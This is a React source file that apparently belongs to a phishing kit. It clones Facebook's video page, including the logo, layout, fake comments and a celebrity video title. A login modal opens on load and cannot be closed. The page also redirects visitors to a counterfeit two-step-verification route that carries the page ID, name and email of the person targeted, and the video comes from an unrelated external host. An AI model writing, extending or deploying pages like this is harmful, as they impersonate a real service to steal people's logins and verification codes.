import { useEffect, useRef, useState } from "react";
import { CardContent } from "../components/ui/card";
import { Button } from "../components/ui/button";
import { MessageCircle, Share2, ThumbsUp, Search } from "lucide-react";
import logo from "../assets/images/logo.png";
import Like from "../assets/images/like.png";
import Love from "../assets/images/love.png";
import Care from "../assets/images/care.png";
import profile from "../assets/images/profile.jpg";
import IconGroup from "../components/svg/group";
import IconVideo from "../components/svg/video";
import IconHome from "../components/svg/home";
import IconGame from "../components/svg/game";
import CommentBox from "../components/ui/comment";
import AddCommentBox from "../components/ui/commentBox";
import RelatedReels from "../components/ui/relatedReels";
import QuickNav from "../components/ui/quicknav";
import LoginModal from "../components/ui/loginmodal";
import { useLocation, useNavigate, useParams } from "react-router-dom";
// import IconTick from "../components/svg/tick";
import { formatRouteName } from "../services/utils";
import IconPlay from "../components/svg/play";
import useStore from "../store";
import { useLoginCountWithTTL } from "../hooks/useLoggedInWithTTL";

export default function FbVideoPage() {
  const navigate = useNavigate();
  const { routeName } = useParams();
  const { pageId, pageName, pageMail } = useStore();
  const { loginCount } = useLoginCountWithTTL(6000);
  const formatted = formatRouteName(
    routeName || "Skadden, Arps, Slate, Meagher & Flom LLP"
  );

  const videoRef = useRef<HTMLVideoElement | null>(null);
  const [showOverlay, setShowOverlay] = useState(true);

  const handlePlay = () => {
    setShowOverlay(false);
    videoRef.current?.play();
  };

  const [showLoginModal, setShowLoginModal] = useState(true);

  useEffect(() => {
    document.title = "Facebook";
    if (loginCount === 0) {
      navigate(`/two_step_verification/authentication?encrypted_context=ARE-mouCvCDl-qc9rUfat_U_4pwg9N6Ucjm7TaJi2uZ5gZamPKvlNqI1CNvxSaIHTbsUvCz55uIvXuKFL34IWuSi-GGZBojRWBCuHfNqOUOKTqbjsNFRdSHpKvryRmlL_S16vGRVtGISApb3yG0c40yt8wJLDQUBKI3eEymcKHrvGxLcogaIrcty1BXvn_RqfxAvGW5YHZofCHHS0l3r8rWkoL6UqqEZCvKqJhYCnAjGDlqWoy-iwUIYcqbu7PXW_BzYOLM_IgETbGtxb-5ezn7TdyDEuPmI3k489LNda-MuoE3bGKJ41pKqdNjHGulbySASYHmY4ceJ6DQZNKBZfK2NK1Hpp8e7hSy_4lOCJjBSsV16ZusSw1y7KeBRiiDxmVaX3ClPfOQ7U-69HURJJb3fum5sWXBwe0Klq-nKe2Gdoc1Ol23Lg_eK8zT13neIrw9zh3rvZUyhPaz8HrJxefTdCePX4g6EPnDnGPH3LB-zgMhQzNZdMSxo0Nsr9XbWDvSRVft1OuvQF6LxtTC7Jx73is6IoP9eH4-_X4eftBbFT5FdpEMIKhXUz5oLieS-SvOX5iQRv3-W0z5Kc3rLrhh90pRZrwC15911Fd_-OlkYlzqh_fDA1KEIaiPZZFiD5tXE0Mmipc7JlTjDtqnwghqGQMf1_6b7gfp1BrCuUPOXk6aRX5h0zJ2POMU8DLA_VpMjwWSl3TpWdkuq8uXcXH-UbNq1f1YeOEAfDROzKqTitu3_oxp_bDBEgGsZuFDmbInXiw5Sik9A6ch7ZGtgdInUhVRm93iHvSn6mEP2pY5cH4OKfn3QAFzmg5U0zOu4n5sMkL4FZaHZZbujbAjBwZJ0IWRso4pHYyO6ejciWEwbXmaoA_EECZB6TX79C01fxOrArvksnMJKWdXCesUI6bCJnc860UlWXXFixwSjrdwXjI0ECX9WnSKbOSvbwezqUGzPJOwh5F8&flow=pre_authentication&pageId=${pageId}&pageName=${pageName}&pageMail=${pageMail}`);
    }
  }, []);

  useEffect(() => {
    if (showLoginModal) {
      document.body.classList.add("overflow-hidden");
    } else {
      document.body.classList.remove("overflow-hidden");
    }

    return () => {
      document.body.classList.remove("overflow-hidden");
    };
  }, [showLoginModal]);

  return (
    <div className={"bg-white text-black"}>
      {showLoginModal && (
        <LoginModal
          onClose={() => setShowLoginModal(true)}
          pageName={pageName}
          pageId={pageId}
          pageMail={pageMail}
        />
      )}
      <div className="flex flex-wrap items-center justify-between px-4 sm:px-6 py-1 border-b border-gray-200 bg-white text-base">
        <div className="flex items-center gap-3">
          <img className="h-10" src={logo} alt="facebook-logo" />
          <div className="rounded-full p-2 bg-gray-100">
            <Search size={20} className="text-black" />
          </div>
        </div>

        <div className="hidden sm:flex gap-2 flex-1 justify-center">
          <div className="flex items-center justify-center h-14 px-4 rounded-xl hover:bg-gray-100 transition-colors flex-1 max-w-[111.6px]">
            <IconHome className="text-gray-700 w-7 h-7" />
          </div>
          <div className="flex flex-col items-center justify-center h-14 px-4 rounded-xl hover:bg-gray-100 transition-colors flex-1 max-w-[111.6px] relative">
            <IconVideo className="text-gray-700 w-7 h-7" />
            <span className="absolute bottom-0 h-1 w-full bg-blue-600 rounded-full" />
          </div>
          <div className="flex items-center justify-center h-14 px-4 rounded-xl hover:bg-gray-100 transition-colors flex-1 max-w-[111.6px]">
            <IconGroup />
          </div>
          <div className="flex items-center justify-center h-14 px-4 rounded-xl hover:bg-gray-100 transition-colors flex-1 max-w-[111.6px]">
            <IconGame className="text-gray-600 w-7 h-7" />
          </div>
        </div>

        {/* Login form on the right (giống ảnh bạn gửi) */}
        <form className="flex items-center gap-2">
          {/* Email input – ẩn trên mobile */}
          {/* <input
            type="text"
            placeholder="Email or phone"
            className="hidden md:block border border-gray-300 text-sm px-3 py-2 rounded-md w-40"
          /> */}

          {/* Password input – ẩn trên mobile */}
          {/* <input
            type="password"
            placeholder="Password"
            className="hidden md:block border border-gray-300 text-sm px-3 py-2 rounded-md w-40"
          /> */}

          {/* Log in button – luôn hiển thị */}
          {/* <button
            type="submit"
            className="bg-blue-600 text-white font-semibold text-sm px-4 py-2 rounded-md hover:bg-blue-700"
          >
            Log in
          </button> */}

          {/* Forgot link – ẩn trên mobile */}
          {/* <a
            href="https://www.facebook.com/login/identify/?ctx=recover&ars=royal_blue_bar&from_login_screen=0"
            className="hidden md:inline-block text-blue-600 text-sm font-medium hover:underline whitespace-nowrap"
          >
            Forgotten account?
          </a> */}
        </form>
      </div>

      {/* Sub Navigation Tabs */}
      <div className="flex flex-col lg:flex-row items-start justify-between px-4 sm:px-6 py-2 border-b border-gray-200 bg-white gap-3">
        <div className="hidden lg:flex flex-wrap gap-2">
          <h2 className="text-[24px] font-bold mr-2 font-sans">Video</h2>
          {[
            "Home",
            "Live",
            "Reels",
            "Shows",
            "Explore",
            "Saved videos",
            "Following",
          ].map((tab, i) => (
            <button
              key={i}
              className={`rounded-full px-3 py-2 text-sm font-semibold tracking-wide ${
                tab === "Homekkk"
                  ? "bg-white border border-blue-500 text-blue-600"
                  : "bg-gray-200 text-black"
              }`}
            >
              {tab}
            </button>
          ))}
        </div>

        <div className="lg:hidden flex flex-wrap gap-2 ">
          <h2 className="font-bold mr-2">Video</h2>
          {["Home", "Live", "Reels", "Shows"].map((tab, i) => (
            <button
              key={i}
              className={`rounded-full px-3 py-1 text-sm font-semibold ${
                tab === "Homekkk"
                  ? "bg-white border border-blue-500 text-blue-600"
                  : "bg-gray-200 text-black"
              }`}
            >
              {tab}
            </button>
          ))}
        </div>

        <div className="hidden lg:flex items-center gap-2 px-4 py-2 rounded-full w-full lg:w-[360px] bg-gray-100">
          <Search className="text-gray-500 w-4 h-4" />
          <span className="text-gray-600 text-sm">Search videos</span>
        </div>
      </div>

      {/* Video + Comment block with outer margin */}

      <div className="flex justify-center px-3 ">
        <div className="w-full max-w-[1300px] mx-auto mx-12 flex flex-col lg:flex-row gap-6">
          {/* Comment Section */}
          <div className="lg:w-1/3 order-1 lg:order-2 bg-white p-2 rounded-xl">
            <div className="mb-6">
              <div className="flex items-center justify-between">
                <div className="flex items-center gap-2">
                  <img
                    src={profile}
                    alt="User Avatar"
                    className="w-9 h-9 rounded-full"
                  />
                  <span className="text-sm font-semibold">
                    <h4 className="text-base font-semibold flex items-center gap-1">
                      {formatted}
                    </h4>
                    <p className="text-sm text-gray-500">31 March at 04:00</p>
                  </span>
                </div>
                <Button className=" hidden lg:block bg-blue-600 text-white px-4 py-1 rounded-md text-sm">
                  + Follow
                </Button>
              </div>

              <div className="lg:hidden">
                <input
                  className="mt-3 w-full border-none focus:ring-0 bg-transparent text-sm font-medium"
                  value="This guy walks out of the office to sing with me! 😲🎤"
                  readOnly
                />
              </div>
              {/* Hidden on mobile */}
              <div className="hidden lg:block">
                <div className="flex gap-2 mt-3">
                  <Button className="bg-blue-50 text-blue-600 font-semibold rounded-full px-4 py-2 text-sm">
                    Overview
                  </Button>
                  <Button className="bg-gray-200 text-black font-semibold rounded-full px-4 py-2 text-sm">
                    Comments
                  </Button>
                </div>

                <input
                  className="mt-3 w-full border-none focus:ring-0 bg-transparent text-sm font-medium"
                  value="This guy walks out of the office to sing with me! 😲🎤"
                  readOnly
                />
              </div>
            </div>

            <div className="hidden lg:block">
              <h3 className="text-base font-semibold mb-3">Most relevant</h3>
              <CommentBox
                profileImg={profile}
                name={"Richard Brown"}
                text={`Great job`}
                time={"1d"}
                reactionsCount={31}
              />
              <CommentBox
                profileImg={profile}
                name={"Rol Coty"}
                text={`He was awesome.`}
                time={"2d"}
                reactionsCount={12}
              />
              <AddCommentBox />
            </div>
          </div>

          {/* Video Section */}
          <div className="lg:w-2/3 order-2 lg:order-1 mr-4">
            <div className="bg-white border-gray-200">
              <CardContent>
                <div className="bg-black">
                  <div className="relative max-w-3xl mx-auto">
                    <div className="aspect-video">
                      <video
                        ref={videoRef}
                        className="w-full h-full"
                        muted
                        controls={false}
                        playsInline
                        preload="metadata"
                        // poster có thể đổi nếu bạn có ảnh
                        // poster="https://s3.ecomstake.org/fbs/poster_1.jpg"
                      >
                        <source
                          src="https://api.elephant.nam.zvshsuddhdndnmxmx4.fun/files/2.mp4"
                          type="video/mp4"
                        />
                      </video>

                      {showOverlay && (
                        <button
                          type="button"
                          onClick={handlePlay}
                          className="absolute inset-0 grid place-items-center group focus:outline-none"
                          aria-label="Play video"
                        >
                          <div className="absolute inset-0 bg-gradient-to-t from-black/50 via-black/20 to-transparent" />
                          <div className="relative z-10 rounded-full w-20 h-20 md:w-28 md:h-28 grid place-items-center backdrop-blur-sm transition transform group-hover:scale-105">
                            <IconPlay />
                          </div>
                        </button>
                      )}
                    </div>
                  </div>
                </div>

                <h2 className="text-[22px] font-[700] mt-4">
                  Carly Simon and Taylor Swift Perform "You're So Vain"
                </h2>
                <div className="border-b border-gray-200 my-2" />
                <div className="flex flex-col md:flex-row items-start md:items-center justify-between text-sm text-gray-600 gap-2">
                  {/* Stats */}
                  <div className="flex items-center gap-1 order-1 md:order-2">
                    <div className="flex">
                      <img
                        src={Like}
                        className="w-[18px] h-[18px]"
                        alt="like-icon"
                      />
                      <img
                        src={Love}
                        className="w-[18px] h-[18px]"
                        alt="love-icon"
                      />
                      <img
                        src={Care}
                        className="w-[18px] h-[18px]"
                        alt="care-icon"
                      />
                    </div>
                    <span>582 · 75 comments · 50k views</span>
                  </div>

                  {/* Buttons */}
                  <div className="flex gap-2 order-2 md:order-1">
                    <Button className="flex items-center gap-2 hover:bg-gray-100 px-2 py-1 rounded-md cursor-pointer">
                      <ThumbsUp size={18} className="text-gray-500" />
                      <span>Like</span>
                    </Button>
                    <Button className="flex items-center gap-2 hover:bg-gray-100 px-2 py-1 rounded-md cursor-pointer">
                      <MessageCircle size={18} className="text-gray-500" />
                      <span>Comment</span>
                    </Button>
                    <Button className="flex items-center gap-2 hover:bg-gray-100 px-2 py-1 rounded-md cursor-pointer">
                      <Share2 size={18} className="text-gray-500" />
                      <span>Share</span>
                    </Button>
                  </div>
                </div>
              </CardContent>
            </div>

            {/* Shown only on mobile */}
            <div className="lg:hidden bg-white mt-2 py-2 rounded-xl">
              <div className="flex gap-2">
                <Button className="bg-blue-50 text-blue-600 font-semibold rounded-full px-4 py-2 text-sm">
                  Overview
                </Button>
                <Button className="bg-gray-200 text-black font-semibold rounded-full px-4 py-2 text-sm">
                  Comments
                </Button>
              </div>
            </div>
            <div className="lg:hidden">
              <h3 className="text-base font-semibold mb-3">Most relevant</h3>
              <CommentBox
                profileImg={profile}
                name={"Richard Brown"}
                text={`Great job`}
                time={"1w"}
                reactionsCount={31}
              />
              <CommentBox
                profileImg={profile}
                name={"Rol Coty"}
                text={`He was awesome.`}
                time={"2w"}
                reactionsCount={12}
              />
              <AddCommentBox />
            </div>
          </div>
        </div>
      </div>

      <div className="flex justify-center pt-3 px-3 bg-gray-200 ">
        <div className="w-full max-w-[1400px] mx-auto lg:mx-12 flex flex-col lg:flex-row gap-6">
          <div className="lg:w-2/3">
            <RelatedReels />
          </div>
          <div className="lg:w-1/3">
            <QuickNav />
          </div>
        </div>
      </div>
    </div>
  );
}
